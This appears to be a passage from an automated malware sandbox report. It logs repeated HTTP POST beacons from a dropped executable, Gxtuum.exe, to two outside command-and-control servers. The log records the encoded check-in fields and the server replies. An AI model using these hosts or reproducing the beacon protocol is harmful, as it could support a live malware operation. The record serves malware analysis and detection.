Dec 13, 2024 07:48:33.251629114 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:34.643469095 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49882	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:33.252262115 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:34.642431974 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49893	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:36.394649029 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:37.974992037 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49894	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:36.394809961 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:37.975018024 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49900	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:39.612216949 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:40.970432997 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:40 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49901	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:39.612792969 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:40.971540928 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:40 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49907	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:42.720627069 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:44.063769102 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:43 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49908	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:42.720639944 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:44.064337015 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:43 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49919	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:45.690417051 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:47.050899982 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49920	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:45.690882921 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:47.050945044 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49926	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:48.799166918 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:50.143004894 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:49 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49927	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:48.799683094 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:50.142918110 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:49 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49938	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:51.843974113 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:53.239470005 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49939	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:51.844192982 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:53.239578962 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49946	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:55.053936005 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:56.359826088 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49945	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:55.053939104 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:48:56.359931946 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49952	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:58.260186911 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:59.706650019 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49953	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:58.260914087 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:48:59.678570032 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49963	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:49:01.423562050 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:49:02.785298109 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:49:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49964	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:49:01.456741095 CET	155	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:49:02.838046074 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:49:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49970	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:49:04.424305916 CET	310	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:49:05.785996914 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:49:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49971	185.81.68.147	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:49:04.470860004 CET	307	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 39 32 32 37 41 39 33 32 31 39 44 41 30 34 30 30 34 43 39 46 33 38 45 46 46 39 36 42 42 46 46 38 38 34 34 32 38 42 35 34 46 37 39 39 35 30 37 45 41 30 46 45 39 35 45 30 30 37 32 42 35 45 30 36 31 43 38 Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B9227A93219DA04004C9F38EFF96BBFF884428B54F799507EA0FE95E0072B5E061C8
Dec 13, 2024 07:49:05.831302881 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:49:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49982	185.81.68.148	80	6968	C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:49:07.532891035 CET	158	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 13, 2024 07:49:08.876770973 CET	205	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:49:08 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Target ID:	0
Start time:	01:47:01
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\tOuVwTJrau.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\tOuVwTJrau.exe"
Imagebase:	0x2e0000
File size:	441'344 bytes
